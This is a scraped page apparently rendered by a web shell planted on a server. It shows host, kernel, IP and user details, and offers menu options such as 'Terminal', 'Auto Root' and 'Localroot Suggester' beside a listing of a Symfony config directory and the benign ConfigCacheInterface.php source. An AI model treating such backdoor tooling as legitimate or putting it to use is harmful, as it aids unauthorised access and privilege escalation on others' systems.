Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.147.67.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Definition
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Exception
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Loader
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Resource
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Util
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
CHANGELOG.md
4.14
KB
-rw-rw-r--
2022-07-20 13:00
ConfigCache.php
1.5
KB
-rw-rw-r--
2022-07-20 13:00
ConfigCacheFactory.php
1.08
KB
-rw-rw-r--
2022-07-20 13:00
ConfigCacheFactoryInterface.php
958
B
-rw-rw-r--
2022-07-20 13:00
ConfigCacheInterface.php
1.25
KB
-rw-rw-r--
2022-07-20 13:00
FileLocator.php
2.48
KB
-rw-rw-r--
2022-07-20 13:00
FileLocatorInterface.php
1.03
KB
-rw-rw-r--
2022-07-20 13:00
LICENSE
1.04
KB
-rw-rw-r--
2022-07-20 13:00
README.md
596
B
-rw-rw-r--
2022-07-20 13:00
ResourceCheckerConfigCache.php
5.46
KB
-rw-rw-r--
2022-07-20 13:00
ResourceCheckerConfigCacheFactory.php
1.05
KB
-rw-rw-r--
2022-07-20 13:00
ResourceCheckerInterface.php
1.2
KB
-rw-rw-r--
2022-07-20 13:00
composer.json
1.32
KB
-rw-rw-r--
2022-07-20 13:00
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\ResourceInterface; /** * Interface for ConfigCache. * * @author Matthias Pigulla <mp@webfactory.de> */ interface ConfigCacheInterface { /** * Gets the cache file path. * * @return string */ public function getPath(); /** * Checks if the cache is still fresh. * * This check should take the metadata passed to the write() method into consideration. * * @return bool */ public function isFresh(); /** * Writes the given content into the cache file. Metadata will be stored * independently and can be used to check cache freshness at a later time. * * @param string $content The content to write into the cache * @param ResourceInterface[]|null $metadata An array of ResourceInterface instances * * @throws \RuntimeException When the cache file cannot be written */ public function write(string $content, array $metadata = null); }